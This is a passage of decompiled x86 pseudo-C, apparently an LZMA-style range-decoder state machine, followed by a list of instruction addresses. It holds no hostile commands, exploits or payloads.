												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                          0x00000000
                                          0x00406c2e
                                          0x00406c2e
                                          0x00406c32
                                          0x00406c5b
                                          0x00406c65
                                          0x00406c34
                                          0x00406c3d
                                          0x00406c4a
                                          0x00406c4d
                                          0x00406f91
                                          0x00406f91
                                          0x00406f94
                                          0x00406f94
                                          0x00406f94
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406fa6
                                          0x00406fc0
                                          0x00406fc3
                                          0x00406fc9
                                          0x00406fd4
                                          0x00406fd6
                                          0x00406fa8
                                          0x00406fa8
                                          0x00406fb7
                                          0x00406fbb
                                          0x00406fbb
                                          0x00406fe0
                                          0x00000000
                                          0x00000000
                                          0x00406fe2
                                          0x00406fe6
                                          0x00407195
                                          0x004071ab
                                          0x004071b3
                                          0x004071ba
                                          0x004071bc
                                          0x004071c3
                                          0x004071c7
                                          0x004071c7
                                          0x00406ff2
                                          0x00406ff9
                                          0x00407001
                                          0x00407004
                                          0x00407007
                                          0x00407007
                                          0x0040700d
                                          0x0040700d
                                          0x004067a9
                                          0x004067a9
                                          0x004067a9
                                          0x004067b2
                                          0x00000000
                                          0x00000000
                                          0x004067b8
                                          0x00000000
                                          0x004067c3
                                          0x00000000
                                          0x00000000
                                          0x004067cc
                                          0x004067cf
                                          0x004067d2
                                          0x004067d6
                                          0x00000000
                                          0x00000000
                                          0x004067dc
                                          0x004067df
                                          0x004067e1
                                          0x004067e2
                                          0x004067e5
                                          0x004067e7
                                          0x004067e8
                                          0x004067ea
                                          0x004067ed
                                          0x004067f2
                                          0x004067f7
                                          0x00406800
                                          0x00406813
                                          0x00406816
                                          0x00406822
                                          0x0040684a
                                          0x0040684c
                                          0x0040685a
                                          0x0040685a
                                          0x0040685e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040684e
                                          0x0040684e
                                          0x00406851
                                          0x00406852
                                          0x00406852
                                          0x00000000
                                          0x0040684e
                                          0x00406828
                                          0x0040682d
                                          0x0040682d
                                          0x00406836
                                          0x0040683e
                                          0x00406841
                                          0x00000000
                                          0x00406847
                                          0x00406847
                                          0x00000000
                                          0x00406847
                                          0x00000000
                                          0x00406864
                                          0x00406864
                                          0x00406868
                                          0x00407114
                                          0x00000000
                                          0x00407114
                                          0x00406871
                                          0x00406881
                                          0x00406884
                                          0x00406887
                                          0x00406887
                                          0x00406887
                                          0x0040688a
                                          0x0040688e
                                          0x00000000
                                          0x00000000
                                          0x00406890
                                          0x00406896
                                          0x004068c0
                                          0x004068c6
                                          0x004068cd
                                          0x00000000
                                          0x004068cd
                                          0x0040689c
                                          0x0040689f
                                          0x004068a4
                                          0x004068a4
                                          0x004068af
                                          0x004068b7
                                          0x004068ba
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004068ff
                                          0x00406905
                                          0x00406908
                                          0x00406915
                                          0x0040691d
                                          0x00406f91
                                          0x00000000
                                          0x00000000
                                          0x004068d4
                                          0x004068d4
                                          0x004068d8
                                          0x00407123
                                          0x00000000
                                          0x00407123
                                          0x004068e4
                                          0x004068ef
                                          0x004068ef
                                          0x004068ef
                                          0x004068f2
                                          0x004068f5
                                          0x004068f8
                                          0x004068fd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406f94
                                          0x00406f94
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406fa6
                                          0x00406fc0
                                          0x00406fc3
                                          0x00406fc9
                                          0x00406fd4
                                          0x00406fd6
                                          0x00406fa8
                                          0x00406fa8
                                          0x00406fb7
                                          0x00406fbb
                                          0x00406fbb
                                          0x00406fe0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406925
                                          0x00406927
                                          0x0040692a
                                          0x0040699b
                                          0x0040699e
                                          0x004069a1
                                          0x004069a8
                                          0x004069b2
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00406f91
                                          0x0040692c
                                          0x00406930
                                          0x00406933
                                          0x00406935
                                          0x00406938
                                          0x0040693b
                                          0x0040693d
                                          0x00406940
                                          0x00406942
                                          0x00406947
                                          0x0040694a
                                          0x0040694d
                                          0x00406951
                                          0x00406958
                                          0x0040695b
                                          0x00406962
                                          0x00406966
                                          0x0040696e
                                          0x0040696e
                                          0x0040696e
                                          0x00406968
                                          0x00406968
                                          0x00406968
                                          0x0040695d
                                          0x0040695d
                                          0x0040695d
                                          0x00406972
                                          0x00406975
                                          0x00406993
                                          0x00406995
                                          0x00000000
                                          0x00406977
